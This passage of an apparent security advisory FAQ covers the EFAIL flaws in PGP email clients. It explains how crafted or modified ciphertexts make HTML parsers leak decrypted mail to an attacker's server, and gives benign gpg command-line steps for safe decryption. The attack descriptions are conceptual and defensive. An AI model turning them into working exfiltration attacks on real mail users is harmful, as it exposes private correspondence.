Since PGP is used as a communication tool, sending messages to others with unpatched clients puts your messages at risk, too. Sending PGP messages to others also increases the risk that they will turn to a vulnerable client to decrypt these messages. Until enough clients are reliably patched, sending PGP-encrypted messages can create adverse ecosystem incentives for others to decrypt them. Balancing the risks of continuing to use PGP can be tricky, and will depend heavily on your own situation and that of your contacts.

Is disabling HTML sufficient?

Turning off sending HTML email will not prevent this attack. For some published attacks, turning off viewing HTML email may protect your messages from being leaked to an attacker by your own client. However, since PGP email is encrypted to both the sender and each recipient, it will not protect these messages from being leaked by anyone else you’ve communicated with. Additionally, turning off HTML email may not protect these messages against future attacks that build on the current vulnerabilities.

Turning off reading HTML email while still sending PGP-encrypted messages encourages others to read these with their own potentially vulnerable clients. This promotes an ecosystem that puts the contents of these messages (as well as any past messages that are decrypted by them) at risk.

I use software that is verified with a PGP signature. Can it be trusted?

Yes! Verifying software signed with PGP is not vulnerable to this class of attack. Package management systems enforcing signature verification (like some distributions of Linux do) are also unaffected.
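Because signature verification involves no mail client or HTML parser, it sits outside the EFAIL attack surface. The sketch below shows the usual detached-signature check; the key, file names, and empty passphrase are all hypothetical, and a throwaway `GNUPGHOME` keeps it isolated from your real keyring (GnuPG 2.1 or later assumed). In practice you would already have the signer's public key and would run only the final `gpg --verify` line.

```shell
# Sketch: detached-signature verification, the unaffected use case.
# A throwaway keyring and demo key keep this self-contained.
export GNUPGHOME="$(mktemp -d)"
cd "$GNUPGHOME"
gpg --batch --pinentry-mode loopback --passphrase '' \
    --quick-generate-key demo@example.com default default never
echo "release tarball contents" > package.tar
gpg --batch --pinentry-mode loopback --passphrase '' \
    --detach-sign package.tar
gpg --verify package.tar.sig package.tar   # exits 0 on a good signature
```

`gpg --verify` exits non-zero if the file or signature has been tampered with, which is why package managers can rely on it for software authenticity.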

What are the vulnerabilities?

There are two attacks of concern demonstrated by the researchers:

1. “Direct exfiltration” attack:

This takes advantage of the details of how mail clients choose to display HTML to the user. The attacker crafts a message that includes the old encrypted message. The new message is constructed in such a way that the mail software displays the entire decrypted message—including the captured ciphertext—as unencrypted text. Then the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls.

2. Ciphertext modification attack:

The second attack abuses the underspecification of certain details in the OpenPGP standard to exfiltrate email contents to the attacker by modifying a previously obtained encrypted email. It takes advantage of OpenPGP’s lack of mandatory integrity verification combined with the HTML parsers built into mail software. Without integrity verification in the client, the attacker can modify captured ciphertexts in such a way that as soon as the mail software displays the modified message in decrypted form, the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. For proper security, the software should never display the plaintext form of a ciphertext if the integrity check fails. Since the OpenPGP standard did not specify what to do when the integrity check fails, some software incorrectly displays the message anyway, enabling this attack. Furthermore, this style of attack, if paired with an exfiltration channel appropriate to the context, may not be limited to the context of HTML-formatted email.

We have more detail about the specifics of the vulnerabilities and details on mitigations.

What does the paper say about my email client?

Some email clients are impacted more than others, and the teams behind those clients are actively working on mitigating the risks presented. The paper describes both direct exfiltration (table 4, page 11) and backchannels (table 5, page 20) for major email clients. Even if your client has patched current vulnerabilities, new attacks may follow.

But I use [insert email software here] and it’s not on the affected list. Should I care?

While you may not be directly affected, the other participants in your encrypted conversations may be. For this attack, it isn’t important whether the sender or any receiver of the original secret message is targeted. This is because a PGP message is encrypted to each of their keys.

Sending PGP messages to others also increases the risk that your recipients will turn to a vulnerable client to decrypt these messages. Until enough clients are reliably patched, sending PGP-encrypted messages can create adverse ecosystem incentives for others to decrypt them.

Does this mean PGP is broken?

The weaknesses in the underlying OpenPGP standard (specifically, OpenPGP’s lack of mandatory integrity verification) enable one of the attacks given in the paper. Despite its pre-existing weaknesses, OpenPGP can still be used reliably within certain constraints. When using PGP to encrypt or decrypt files at rest, or to verify software with strict signature checking, PGP still behaves according to expectation.
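The file-at-rest case mentioned above can be sketched briefly: no email client or HTML parser is involved, so the known exfiltration channels do not apply. Symmetric mode (`-c`) keeps this demo self-contained; public-key mode (`-e -r KEYID`) behaves the same for this purpose. The file names and passphrase are hypothetical, and the batch flags exist only so the sketch runs without prompts.

```shell
# Sketch of encrypting and decrypting a file at rest with gpg.
cd "$(mktemp -d)"
echo "notes kept on disk" > notes.txt
gpg --batch --yes --pinentry-mode loopback --passphrase demo -c notes.txt
rm notes.txt                      # only notes.txt.gpg remains at rest
gpg --batch --pinentry-mode loopback --passphrase demo -d notes.txt.gpg
```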

OpenPGP also uses underlying cryptographic primitives such as SHA-1, which is no longer considered safe, lacks the benefits of Authenticated Encryption (AE), and allows signatures to be trivially stripped from messages. In time, newer standards will have to be developed which address these more fundamental problems in the specification. Unfortunately, introducing authenticated encryption without also rotating keys to strictly enforce usage constraints would leave OpenPGP susceptible to backwards-compatibility attacks. This will have to be addressed in any future standard.

In short, OpenPGP can be trusted to a certain degree. For long-term security of sensitive communications, we suggest you migrate to another end-to-end encrypted platform.

What should I do about PGP software on my computer?

In general, keeping PGP (or GPG) on your system should be safe from the known exploits, provided that it is disconnected from email as described above. Some Linux systems depend on GPG for software verification, and PGP is still useful for manually verifying software. Uninstalling your PGP software may make your keys inaccessible and prevent you from decrypting past messages in some instances, as well.

Can my previous emails be read by an attacker?

If the PGP-encrypted contents of previous emails are sent to you in new emails using this attack and you open that email in an unpatched email client with PGP software enabled, then yes. For viewing your archive of encrypted emails, we recommend using the command line.

What if I keep getting PGP emails?

You can decrypt these emails via the command line. If you prefer not to, notify your contacts that PGP is, for the time being, no longer safe to use in email clients and decide whether the conversation can continue over another end-to-end encrypted platform, such as Signal.
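If saved messages accumulate, the per-file command can be wrapped in a loop. This is a hypothetical sketch: the demo inputs are symmetric-encrypted so it runs anywhere, whereas with real mail a plain `gpg -d "$f"` would prompt for your key's passphrase; the file names are assumptions. Note that writing decrypted output to disk trades some caution for convenience, so prefer viewing in the terminal for sensitive content.

```shell
# Hypothetical batch sketch: decrypt every saved .eml in a folder to .txt.
cd "$(mktemp -d)"
for i in 1 2; do                  # create two demo "saved emails"
    echo "message $i" > "msg$i.plain"
    gpg --batch --yes --pinentry-mode loopback --passphrase demo \
        -c -o "msg$i.eml" "msg$i.plain"
done
for f in *.eml; do                # decrypt each one on the command line
    gpg --batch --pinentry-mode loopback --passphrase demo \
        -d "$f" > "${f%.eml}.txt" 2>/dev/null
done
cat msg1.txt msg2.txt
```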

Going forward, what should I look out for?

We will be following this issue closely in the coming weeks. Authors of email clients and PGP plugins are actively working to patch these vulnerabilities, so you should expect updates soon.

Is there a replacement for sending end-to-end encrypted messages?

There is no secure, vetted replacement for PGP in email.

There are, however, other end-to-end secure messaging tools that provide similar levels of security: for instance, Signal. If you need to communicate securely during this period of uncertainty, we recommend you consider these alternatives.

I don’t have other end-to-end encrypted messaging options available. PGP is my only option. Can I still use it?

Unfortunately, we cannot recommend using PGP in email clients until they have been patched, both on your device and your recipient’s device. The timeline for these patches varies from client to client. We recommend disconnecting PGP from your email client until the appropriate mitigations have been released.

I don’t want to use the command line. Surely there’s a usable alternative. Can’t you recommend something else?

It’s very difficult to assess new software configurations in such a short timeframe. Some email clients are more vulnerable to this attack than others. However, using these email clients can have the effect of putting others at risk. We suggest decrypting archived emails with the command line, and moving to another end-to-end platform for conversations, at least until we are confident that the PGP email ecosystem has been restored to its previous level of security.

I only use PGP in the command line. Am I affected?

Yes and no. As we currently understand, if you are using PGP solely for file encryption, without email, there are no known exfiltration channels to send the file contents to an attacker. However, the contents may still have been modified in transit in a way that you won’t necessarily be able to see, depending on how your particular PGP implementation handles integrity-check failures. This is due to the integrity downgrade aspect of the vulnerability.

Additionally, if you are using PGP to encrypt a message sent over email and your recipient uses a vulnerable email client, your correspondences are at risk of decryption. As it’s likely that many people use an email client to access PGP-encrypted emails, it’s important to clarify with your recipients that they have also disabled PGP in their email clients, or are using an unaffected client.

If you must continue sensitive correspondences, we highly recommend switching to a vetted end-to-end encryption tool.

Using the Command Line to Decrypt a Message on Windows

If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL.

1. Open the start menu by clicking the “Windows” icon in the bottom-left corner of the screen or pressing the “Windows” key on your keyboard.

2. Next, type “cmd” in the start menu that appears, then press the “Enter” key.

3. You will now see a “Command Prompt” window appear.

4. Type exactly “cd Desktop”, then hit the “Enter” key.

5. Type the following text exactly: “gpg -d encrypted.eml”, then hit the “Enter” key. Outlook users should type exactly “gpg -d encrypted.asc” instead.

6. You will now be prompted to enter your GPG passphrase. Type it into the dialog, which may look different for Enigmail users, then hit the “Enter” key.

7. You should now see the contents of the message in the Command Prompt window.

These notes are based on Windows 10 with Gpg4win.

Using the Command Line to Decrypt a Message on macOS

If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL.

1. Open Finder (the blue smiley face icon) from the dock.

2. Click Applications on the left side of the window.

3. Scroll down and double-click the Utilities folder.

4. Double-click Terminal to open the command line.

5. Type “cd Desktop” and hit enter to go to your desktop. Mind the capital ‘D’!

6. Type “gpg -d encrypted.eml”. (Note: if you named your file something else, swap it in for “encrypted.eml”. Be mindful of capitalization and spelling!)

7. This will prompt you for your PGP passphrase and output the full email in the terminal window. Note that attachments and emoji will not render using this method, and the output will be in plaintext. Email headers will be visible, as well as the PGP signature.


